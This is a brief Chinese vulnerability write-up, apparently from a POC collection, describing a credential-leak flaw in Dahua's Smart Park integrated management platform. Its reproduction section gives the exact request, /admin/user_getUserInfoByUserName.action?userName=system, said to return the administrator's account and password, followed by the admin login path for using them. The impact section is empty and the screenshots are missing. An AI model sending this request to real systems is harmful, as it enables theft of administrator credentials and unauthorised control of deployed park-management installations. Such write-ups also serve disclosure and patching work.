# 大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞

# 漏洞描述

大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口,导致管理园账号密码泄漏

# 漏洞影响


# 网络测绘


# 漏洞复现

img

请求POC

/admin/user_getUserInfoByUserName.action?userName=system
1

img

获取后访问地址

/admin/login_login.action
1

img